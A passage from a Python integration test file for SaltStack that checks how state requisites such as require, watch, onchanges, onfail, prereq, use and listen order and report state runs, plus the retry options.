# 'Cannot extend state foobar for ID A in "base:requisites.require_error2".'
# + ' It is not part of the high state.'
#])
ret = self.run_function('state.sls', mods='requisites.require_recursion_error1')
self.assertEqual(
ret,
['A recursive requisite was found, SLS "requisites.require_recursion_error1" ID "B" ID "A"']
)
def test_requisites_require_any(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 3,
'comment': 'Command "echo A" run',
'result': True,
'changes': True,
},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B" run',
'result': True,
'changes': True,
},
'cmd_|-C_|-/bin/false_|-run': {
'__run_num__': 1,
'comment': 'Command "/bin/false" run',
'result': False,
'changes': True,
},
'cmd_|-D_|-echo D_|-run': {
'__run_num__': 2,
'comment': 'Command "echo D" run',
'result': True,
'changes': True,
},
}
ret = self.run_function('state.sls', mods='requisites.require_any')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_require_any_fail(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
ret = self.run_function('state.sls', mods='requisites.require_any_fail')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertIn('One or more requisite failed',
result['cmd_|-D_|-echo D_|-run']['comment'])
def test_requisites_watch_any(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
if salt.utils.platform.is_windows():
cmd_true = 'exit'
cmd_false = 'exit /B 1'
else:
cmd_true = 'true'
cmd_false = 'false'
expected_result = {
'cmd_|-A_|-{0}_|-wait'.format(cmd_true): {
'__run_num__': 4,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-B_|-{0}_|-run'.format(cmd_true): {
'__run_num__': 0,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-C_|-{0}_|-run'.format(cmd_false): {
'__run_num__': 1,
'comment': 'Command "{0}" run'.format(cmd_false),
'result': False,
'changes': True,
},
'cmd_|-D_|-{0}_|-run'.format(cmd_true): {
'__run_num__': 2,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-E_|-{0}_|-wait'.format(cmd_true): {
'__run_num__': 9,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-F_|-{0}_|-run'.format(cmd_true): {
'__run_num__': 5,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-G_|-{0}_|-run'.format(cmd_false): {
'__run_num__': 6,
'comment': 'Command "{0}" run'.format(cmd_false),
'result': False,
'changes': True,
},
'cmd_|-H_|-{0}_|-run'.format(cmd_false): {
'__run_num__': 7,
'comment': 'Command "{0}" run'.format(cmd_false),
'result': False,
'changes': True,
},
}
ret = self.run_function('state.sls', mods='requisites.watch_any')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_watch_any_fail(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
ret = self.run_function('state.sls', mods='requisites.watch_any_fail')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertIn('One or more requisite failed',
result['cmd_|-A_|-true_|-wait']['comment'])
def test_requisites_onchanges_any(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-another_changing_state_|-echo "Changed!"_|-run': {
'__run_num__': 1,
'changes': True,
'comment': 'Command "echo "Changed!"" run',
'result': True
},
'cmd_|-changing_state_|-echo "Changed!"_|-run': {
'__run_num__': 0,
'changes': True,
'comment': 'Command "echo "Changed!"" run',
'result': True
},
'cmd_|-test_one_changing_states_|-echo "Success!"_|-run': {
'__run_num__': 4,
'changes': True,
'comment': 'Command "echo "Success!"" run',
'result': True
},
'cmd_|-test_two_non_changing_states_|-echo "Should not run"_|-run': {
'__run_num__': 5,
'changes': False,
'comment': 'State was not run because none of the onchanges reqs changed',
'result': True
},
'pip_|-another_non_changing_state_|-mock_|-installed': {
'__run_num__': 3,
'changes': False,
'comment': 'Python package mock was already installed\nAll specified packages are already installed',
'result': True
},
'pip_|-non_changing_state_|-mock_|-installed': {
'__run_num__': 2,
'changes': False,
'comment': 'Python package mock was already installed\nAll specified packages are already installed',
'result': True
}
}
ret = self.run_function('state.sls', mods='requisites.onchanges_any')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_onfail_any(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-a_|-exit 0_|-run': {
'__run_num__': 0,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-b_|-exit 1_|-run': {
'__run_num__': 1,
'changes': True,
'comment': 'Command "exit 1" run',
'result': False
},
'cmd_|-c_|-exit 0_|-run': {
'__run_num__': 2,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-d_|-echo itworked_|-run': {
'__run_num__': 3,
'changes': True,
'comment': 'Command "echo itworked" run',
'result': True},
'cmd_|-e_|-exit 0_|-run': {
'__run_num__': 4,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-f_|-exit 0_|-run': {
'__run_num__': 5,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-g_|-exit 0_|-run': {
'__run_num__': 6,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-h_|-echo itworked_|-run': {
'__run_num__': 7,
'changes': False,
'comment': 'State was not run because onfail req did not change',
'result': True
}
}
ret = self.run_function('state.sls', mods='requisites.onfail_any')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_onfail_all(self):
'''
Call sls file containing several onfail-all
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-a_|-exit 0_|-run': {
'__run_num__': 0,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-b_|-exit 0_|-run': {
'__run_num__': 1,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-c_|-exit 0_|-run': {
'__run_num__': 2,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-d_|-exit 1_|-run': {
'__run_num__': 3,
'changes': True,
'comment': 'Command "exit 1" run',
'result': False
},
'cmd_|-e_|-exit 1_|-run': {
'__run_num__': 4,
'changes': True,
'comment': 'Command "exit 1" run',
'result': False
},
'cmd_|-f_|-exit 1_|-run': {
'__run_num__': 5,
'changes': True,
'comment': 'Command "exit 1" run',
'result': False
},
'cmd_|-reqs also met_|-echo itonfailed_|-run': {
'__run_num__': 9,
'changes': True,
'comment': 'Command "echo itonfailed" run',
'result': True
},
'cmd_|-reqs also not met_|-echo italsodidnonfail_|-run': {
'__run_num__': 7,
'changes': False,
'comment':
'State was not run because onfail req did not change',
'result': True
},
'cmd_|-reqs met_|-echo itonfailed_|-run': {
'__run_num__': 8,
'changes': True,
'comment': 'Command "echo itonfailed" run',
'result': True
},
'cmd_|-reqs not met_|-echo itdidntonfail_|-run': {
'__run_num__': 6,
'changes': False,
'comment':
'State was not run because onfail req did not change',
'result': True
}
}
ret = self.run_function('state.sls', mods='requisites.onfail_all')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_full_sls(self):
'''
Teste the sls special command in requisites
'''
expected_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 2,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C" run',
'result': True,
'changes': True},
}
ret = self.run_function('state.sls', mods='requisites.fullsls_require')
self.assertReturnNonEmptySaltType(ret)
result = self.normalize_ret(ret)
self.assertEqual(expected_result, result)
# issue #8233: traceback on prereq sls
# TODO: not done
#ret = self.run_function('state.sls', mods='requisites.fullsls_prereq')
#self.assertEqual(['sls command can only be used with require requisite'], ret)
def test_requisites_require_no_state_module(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-A_|-echo A fifth_|-run': {
'__run_num__': 4,
'comment': 'Command "echo A fifth" run',
'result': True,
'changes': True,
},
'cmd_|-B_|-echo B second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B second" run',
'result': True,
'changes': True,
},
'cmd_|-C_|-echo C third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo C third" run',
'result': True,
'changes': True,
},
'cmd_|-D_|-echo D first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo D first" run',
'result': True,
'changes': True,
},
'cmd_|-E_|-echo E fourth_|-run': {
'__run_num__': 3,
'comment': 'Command "echo E fourth" run',
'result': True,
'changes': True,
},
'cmd_|-G_|-echo G_|-run': {
'__run_num__': 5,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' id: Z\n',
'result': False,
'changes': False,
},
'cmd_|-H_|-echo H_|-run': {
'__run_num__': 6,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' id: Z\n',
'result': False,
'changes': False,
}
}
ret = self.run_function('state.sls', mods='requisites.require_no_state_module')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_prereq_simple_ordering_and_errors(self):
'''
Call sls file containing several prereq_in and prereq.
Ensure that some of them are failing and that the order is right.
'''
expected_result_simple = {
'cmd_|-A_|-echo A third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo A third" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B first" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C second" run',
'result': True,
'changes': True},
'cmd_|-I_|-echo I_|-run': {
'__run_num__': 3,
'comment': 'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' cmd: Z\n',
'result': False,
'changes': False},
'cmd_|-J_|-echo J_|-run': {
'__run_num__': 4,
'comment': 'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' foobar: A\n',
'result': False,
'changes': False}
}
expected_result_simple_no_state_module = {
'cmd_|-A_|-echo A third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo A third" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B first" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C second" run',
'result': True,
'changes': True},
'cmd_|-I_|-echo I_|-run': {
'__run_num__': 3,
'comment': 'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' id: Z\n',
'result': False,
'changes': False}
}
expected_result_simple2 = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 1,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 2,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 0,
'comment': 'Command "echo C" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D_|-run': {
'__run_num__': 3,
'comment': 'Command "echo D" run',
'result': True,
'changes': True},
'cmd_|-E_|-echo E_|-run': {
'__run_num__': 4,
'comment': 'Command "echo E" run',
'result': True,
'changes': True}
}
expected_result_simple3 = {
'cmd_|-A_|-echo A first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo A first" run',
'result': True,
'changes': True,
},
'cmd_|-B_|-echo B second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B second" run',
'result': True,
'changes': True,
},
'cmd_|-C_|-echo C third_|-wait': {
'__run_num__': 2,
'comment': '',
'result': True,
'changes': False,
}
}
expected_result_complex = {
'cmd_|-A_|-echo A fourth_|-run': {
'__run_num__': 3,
'comment': 'Command "echo A fourth" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B first" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C second" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo D third" run',
'result': True,
'changes': True},
}
ret = self.run_function('state.sls', mods='requisites.prereq_simple')
self.assertReturnNonEmptySaltType(ret)
result = self.normalize_ret(ret)
self.assertEqual(expected_result_simple, result)
# same test, but not using lists in yaml syntax
# TODO: issue #8235, prereq ignored when not used in list syntax
# Currently fails badly with :
# TypeError encountered executing state.sls: string indices must be integers, not str.
#expected_result_simple.pop('cmd_|-I_|-echo I_|-run')
#expected_result_simple.pop('cmd_|-J_|-echo J_|-run')
#ret = self.run_function('state.sls', mods='requisites.prereq_simple_nolist')
#result = self.normalize_ret(ret)
#self.assertEqual(expected_result_simple, result)
ret = self.run_function('state.sls', mods='requisites.prereq_simple2')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result_simple2, result)
ret = self.run_function('state.sls', mods='requisites.prereq_simple3')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result_simple3, result)
#ret = self.run_function('state.sls', mods='requisites.prereq_error_nolist')
#self.assertEqual(
# ret,
# ['Cannot extend ID Z in "base:requisites.prereq_error_nolist".'
# + ' It is not part of the high state.']
#)
ret = self.run_function('state.sls', mods='requisites.prereq_compile_error1')
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(
ret['cmd_|-B_|-echo B_|-run']['comment'],
'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' foobar: A\n'
)
ret = self.run_function('state.sls', mods='requisites.prereq_compile_error2')
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(
ret['cmd_|-B_|-echo B_|-run']['comment'],
'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' foobar: C\n'
)
ret = self.run_function('state.sls', mods='requisites.prereq_complex')
result = self.normalize_ret(ret)
self.assertEqual(expected_result_complex, result)
# issue #8210 : prereq recursion undetected
# TODO: this test fails
#ret = self.run_function('state.sls', mods='requisites.prereq_recursion_error')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_recursion_error" ID "B" ID "A"']
#)
ret = self.run_function('state.sls', mods='requisites.prereq_simple_no_state_module')
result = self.normalize_ret(ret)
self.assertEqual(expected_result_simple_no_state_module, result)
def test_infinite_recursion_sls_prereq(self):
ret = self.run_function('state.sls', mods='requisites.prereq_sls_infinite_recursion')
self.assertSaltTrueReturn(ret)
def test_requisites_use(self):
'''
Call sls file containing several use_in and use.
'''
# TODO issue #8235 & #8774 some examples are still commented in the test file
ret = self.run_function('state.sls', mods='requisites.use')
self.assertReturnNonEmptySaltType(ret)
for item, descr in six.iteritems(ret):
self.assertEqual(descr['comment'], 'onlyif condition is false')
# TODO: issue #8802 : use recursions undetected
# issue is closed as use does not actually inherit requisites
# if chain-use is added after #8774 resolution theses tests would maybe become useful
#ret = self.run_function('state.sls', mods='requisites.use_recursion')
#self.assertEqual(ret, [
# 'A recursive requisite was found, SLS "requisites.use_recursion"'
# + ' ID "B" ID "A"'
#])
#ret = self.run_function('state.sls', mods='requisites.use_recursion2')
#self.assertEqual(ret, [
# 'A recursive requisite was found, SLS "requisites.use_recursion2"'
# + ' ID "C" ID "A"'
#])
#ret = self.run_function('state.sls', mods='requisites.use_auto_recursion')
#self.assertEqual(ret, [
# 'A recursive requisite was found, SLS "requisites.use_recursion"'
# + ' ID "A" ID "A"'
#])
def test_requisites_use_no_state_module(self):
'''
Call sls file containing several use_in and use.
'''
ret = self.run_function('state.sls', mods='requisites.use_no_state_module')
self.assertReturnNonEmptySaltType(ret)
for item, descr in six.iteritems(ret):
self.assertEqual(descr['comment'], 'onlyif condition is false')
def test_get_file_from_env_in_top_match(self):
tgt = os.path.join(TMP, 'prod-cheese-file')
try:
ret = self.run_function(
'state.highstate', minion_tgt='sub_minion'
)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isfile(tgt))
with salt.utils.files.fopen(tgt, 'r') as cheese:
data = salt.utils.stringutils.to_unicode(cheese.read())
self.assertIn('Gromit', data)
self.assertIn('Comte', data)
finally:
if os.path.islink(tgt):
os.unlink(tgt)
# onchanges tests
def test_onchanges_requisite(self):
'''
Tests a simple state using the onchanges requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onchanges_simple')
# First, test the result of the state run when changes are expected to happen
test_data = state_run['cmd_|-test_changing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when changes are not expected to happen
test_data = state_run['cmd_|-test_non_changing_state_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because none of the onchanges reqs changed'
self.assertIn(expected_result, test_data)
def test_onchanges_requisite_multiple(self):
'''
Tests a simple state using the onchanges requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls',
mods='requisites.onchanges_multiple')
# First, test the result of the state run when two changes are expected to happen
test_data = state_run['cmd_|-test_two_changing_states_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when two changes are not expected to happen
test_data = state_run['cmd_|-test_two_non_changing_states_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because none of the onchanges reqs changed'
self.assertIn(expected_result, test_data)
# Finally, test the result of the state run when only one of the onchanges requisites changes.
test_data = state_run['cmd_|-test_one_changing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
def test_onchanges_in_requisite(self):
'''
Tests a simple state using the onchanges_in requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onchanges_in_simple')
# First, test the result of the state run of when changes are expected to happen
test_data = state_run['cmd_|-test_changes_expected_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when changes are not expected to happen
test_data = state_run['cmd_|-test_changes_not_expected_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because none of the onchanges reqs changed'
self.assertIn(expected_result, test_data)
def test_onchanges_requisite_no_state_module(self):
'''
Tests a simple state using the onchanges requisite without state modules
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onchanges_simple_no_state_module')
test_data = state_run['cmd_|-test_changing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
def test_onchanges_requisite_with_duration(self):
'''
Tests a simple state using the onchanges requisite
the state will not run but results will include duration
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onchanges_simple')
# Then, test the result of the state run when changes are not expected to happen
# and ensure duration is included in the results
test_data = state_run['cmd_|-test_non_changing_state_|-echo "Should not run"_|-run']
self.assertIn('duration', test_data)
# onfail tests
def test_onfail_requisite(self):
'''
Tests a simple state using the onfail requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onfail_simple')
# First, test the result of the state run when a failure is expected to happen
test_data = state_run['cmd_|-test_failing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when a failure is not expected to happen
test_data = state_run['cmd_|-test_non_failing_state_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because onfail req did not change'
self.assertIn(expected_result, test_data)
def test_multiple_onfail_requisite(self):
'''
test to ensure state is run even if only one
of the onfails fails. This is a test for the issue:
https://github.com/saltstack/salt/issues/22370
'''
state_run = self.run_function('state.sls', mods='requisites.onfail_multiple')
retcode = state_run['cmd_|-c_|-echo itworked_|-run']['changes']['retcode']
self.assertEqual(retcode, 0)
stdout = state_run['cmd_|-c_|-echo itworked_|-run']['changes']['stdout']
self.assertEqual(stdout, 'itworked')
def test_onfail_in_requisite(self):
'''
Tests a simple state using the onfail_in requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onfail_in_simple')
# First, test the result of the state run when a failure is expected to happen
test_data = state_run['cmd_|-test_failing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when a failure is not expected to happen
test_data = state_run['cmd_|-test_non_failing_state_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because onfail req did not change'
self.assertIn(expected_result, test_data)
def test_onfail_requisite_no_state_module(self):
'''
Tests a simple state using the onfail requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onfail_simple_no_state_module')
# First, test the result of the state run when a failure is expected to happen
test_data = state_run['cmd_|-test_failing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when a failure is not expected to happen
test_data = state_run['cmd_|-test_non_failing_state_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because onfail req did not change'
self.assertIn(expected_result, test_data)
def test_onfail_requisite_with_duration(self):
'''
Tests a simple state using the onfail requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onfail_simple')
# Then, test the result of the state run when a failure is not expected to happen
test_data = state_run['cmd_|-test_non_failing_state_|-echo "Should not run"_|-run']
self.assertIn('duration', test_data)
def test_multiple_onfail_requisite_with_required(self):
'''
test to ensure multiple states are run
when specified as onfails for a single state.
This is a test for the issue:
https://github.com/saltstack/salt/issues/46552
'''
state_run = self.run_function('state.sls', mods='requisites.onfail_multiple_required')
retcode = state_run['cmd_|-b_|-echo b_|-run']['changes']['retcode']
self.assertEqual(retcode, 0)
retcode = state_run['cmd_|-c_|-echo c_|-run']['changes']['retcode']
self.assertEqual(retcode, 0)
retcode = state_run['cmd_|-d_|-echo d_|-run']['changes']['retcode']
self.assertEqual(retcode, 0)
stdout = state_run['cmd_|-b_|-echo b_|-run']['changes']['stdout']
self.assertEqual(stdout, 'b')
stdout = state_run['cmd_|-c_|-echo c_|-run']['changes']['stdout']
self.assertEqual(stdout, 'c')
stdout = state_run['cmd_|-d_|-echo d_|-run']['changes']['stdout']
self.assertEqual(stdout, 'd')
comment = state_run['cmd_|-e_|-echo e_|-run']['comment']
self.assertEqual(comment, 'State was not run because onfail req did not change')
stdout = state_run['cmd_|-f_|-echo f_|-run']['changes']['stdout']
self.assertEqual(stdout, 'f')
def test_multiple_onfail_requisite_with_required_no_run(self):
'''
test to ensure multiple states are not run
when specified as onfails for a single state
which fails.
This is a test for the issue:
https://github.com/saltstack/salt/issues/46552
'''
state_run = self.run_function('state.sls', mods='requisites.onfail_multiple_required_no_run')
expected = 'State was not run because onfail req did not change'
stdout = state_run['cmd_|-b_|-echo b_|-run']['comment']
self.assertEqual(stdout, expected)
stdout = state_run['cmd_|-c_|-echo c_|-run']['comment']
self.assertEqual(stdout, expected)
stdout = state_run['cmd_|-d_|-echo d_|-run']['comment']
self.assertEqual(stdout, expected)
# listen tests
def test_listen_requisite(self):
'''
Tests a simple state using the listen requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_simple')
# First, test the result of the state run when a listener is expected to trigger
listener_state = 'cmd_|-listener_test_listening_change_state_|-echo "Listening State"_|-mod_watch'
self.assertIn(listener_state, state_run)
# Then, test the result of the state run when a listener should not trigger
absent_state = 'cmd_|-listener_test_listening_non_changing_state_|-echo "Only run once"_|-mod_watch'
self.assertNotIn(absent_state, state_run)
def test_listen_in_requisite(self):
'''
Tests a simple state using the listen_in requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_in_simple')
# First, test the result of the state run when a listener is expected to trigger
listener_state = 'cmd_|-listener_test_listening_change_state_|-echo "Listening State"_|-mod_watch'
self.assertIn(listener_state, state_run)
# Then, test the result of the state run when a listener should not trigger
absent_state = 'cmd_|-listener_test_listening_non_changing_state_|-echo "Only run once"_|-mod_watch'
self.assertNotIn(absent_state, state_run)
def test_listen_in_requisite_resolution(self):
'''
Verify listen_in requisite lookups use ID declaration to check for changes
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_in_simple')
# Test the result of the state run when a listener is expected to trigger
listener_state = 'cmd_|-listener_test_listen_in_resolution_|-echo "Successful listen_in resolution"_|-mod_watch'
self.assertIn(listener_state, state_run)
def test_listen_requisite_resolution(self):
'''
Verify listen requisite lookups use ID declaration to check for changes
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_simple')
# Both listeners are expected to trigger
listener_state = 'cmd_|-listener_test_listening_resolution_one_|-echo "Successful listen resolution"_|-mod_watch'
self.assertIn(listener_state, state_run)
listener_state = 'cmd_|-listener_test_listening_resolution_two_|-echo "Successful listen resolution"_|-mod_watch'
self.assertIn(listener_state, state_run)
def test_listen_requisite_no_state_module(self):
'''
Tests a simple state using the listen requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_simple_no_state_module')
# First, test the result of the state run when a listener is expected to trigger
listener_state = 'cmd_|-listener_test_listening_change_state_|-echo "Listening State"_|-mod_watch'
self.assertIn(listener_state, state_run)
# Then, test the result of the state run when a listener should not trigger
absent_state = 'cmd_|-listener_test_listening_non_changing_state_|-echo "Only run once"_|-mod_watch'
self.assertNotIn(absent_state, state_run)
def test_listen_in_requisite_resolution_names(self):
'''
Verify listen_in requisite lookups use ID declaration to check for changes
and resolves magic names state variable
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_in_names')
self.assertIn('test_|-listener_service_|-nginx_|-mod_watch', state_run)
self.assertIn('test_|-listener_service_|-crond_|-mod_watch', state_run)
def test_listen_requisite_resolution_names(self):
'''
Verify listen requisite lookups use ID declaration to check for changes
and resolves magic names state variable
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_names')
self.assertIn('test_|-listener_service_|-nginx_|-mod_watch', state_run)
self.assertIn('test_|-listener_service_|-crond_|-mod_watch', state_run)
def test_issue_30820_requisite_in_match_by_name(self):
'''
This tests the case where a requisite_in matches by name instead of ID
See https://github.com/saltstack/salt/issues/30820 for more info
'''
state_run = self.run_function(
'state.sls',
mods='requisites.requisite_in_match_by_name'
)
bar_state = 'cmd_|-bar state_|-echo bar_|-wait'
self.assertIn(bar_state, state_run)
self.assertEqual(state_run[bar_state]['comment'],
'Command "echo bar" run')
def test_retry_option_defaults(self):
'''
test the retry option on a simple state with defaults
ensure comment is as expected
ensure state duration is greater than default retry_interval (30 seconds)
'''
state_run = self.run_function(
'state.sls',
mods='retry.retry_defaults'
)
retry_state = 'file_|-file_test_|-/path/to/a/non-existent/file.txt_|-exists'
expected_comment = ('Attempt 1: Returned a result of "False", with the following '
'comment: "Specified path /path/to/a/non-existent/file.txt does not exist"\n'
'Specified path /path/to/a/non-existent/file.txt does not exist')
self.assertEqual(state_run[retry_state]['comment'], expected_comment)
self.assertTrue(state_run[retry_state]['duration'] > 30)
self.assertEqual(state_run[retry_state]['result'], False)
def test_retry_option_custom(self):
'''
test the retry option on a simple state with custom retry values
ensure comment is as expected
ensure state duration is greater than custom defined interval * (retries - 1)
'''
state_run = self.run_function(
'state.sls',
mods='retry.retry_custom'
)
retry_state = 'file_|-file_test_|-/path/to/a/non-existent/file.txt_|-exists'
expected_comment = ('Attempt 1: Returned a result of "False", with the following '
'comment: "Specified path /path/to/a/non-existent/file.txt does not exist"\n'
'Attempt 2: Returned a result of "False", with the following comment: "Specified'
' path /path/to/a/non-existent/file.txt does not exist"\nAttempt 3: Returned'
' a result of "False", with the following comment: "Specified path'
' /path/to/a/non-existent/file.txt does not exist"\nAttempt 4: Returned a'
' result of "False", with the following comment: "Specified path'
' /path/to/a/non-existent/file.txt does not exist"\nSpecified path'
' /path/to/a/non-existent/file.txt does not exist')
self.assertEqual(state_run[retry_state]['comment'], expected_comment)
self.assertTrue(state_run[retry_state]['duration'] > 40)
self.assertEqual(state_run[retry_state]['result'], False)
def test_retry_option_success(self):
'''
test a state with the retry option that should return True immedietly (i.e. no retries)
'''
testfile = os.path.join(TMP, 'retry_file')
state_run = self.run_function(
'state.sls',
mods='retry.retry_success'
)
os.unlink(testfile)
retry_state = 'file_|-file_test_|-{0}_|-exists'.format(testfile)
self.assertNotIn('Attempt', state_run[retry_state]['comment'])
def run_create(self):
'''
helper function to wait 30 seconds and then create the temp retry file
'''
testfile = os.path.join(TMP, 'retry_file')
time.sleep(30)
with salt.utils.files.fopen(testfile, 'a'):
pass
def test_retry_option_eventual_success(self):
'''
test a state with the retry option that should return True after at least 4 retry attmempt
but never run 15 attempts
'''
testfile = os.path.join(TMP, 'retry_file')
create_thread = threading.Thread(target=self.run_create)
create_thread.start()
state_run = self.run_function(
'state.sls',
mods='retry.retry_success2'
)
retry_state = 'file_|-file_test_|-{0}_|-exists'.format(testfile)
self.assertIn('Attempt 1:', state_run[retry_state]['comment'])
self.assertIn('Attempt 2:', state_run[retry_state]['comment'])
self.assertIn('Attempt 3:', state_run[retry_state]['comment'])
self.assertIn('Attempt 4:', state_run[retry_state]['comment'])
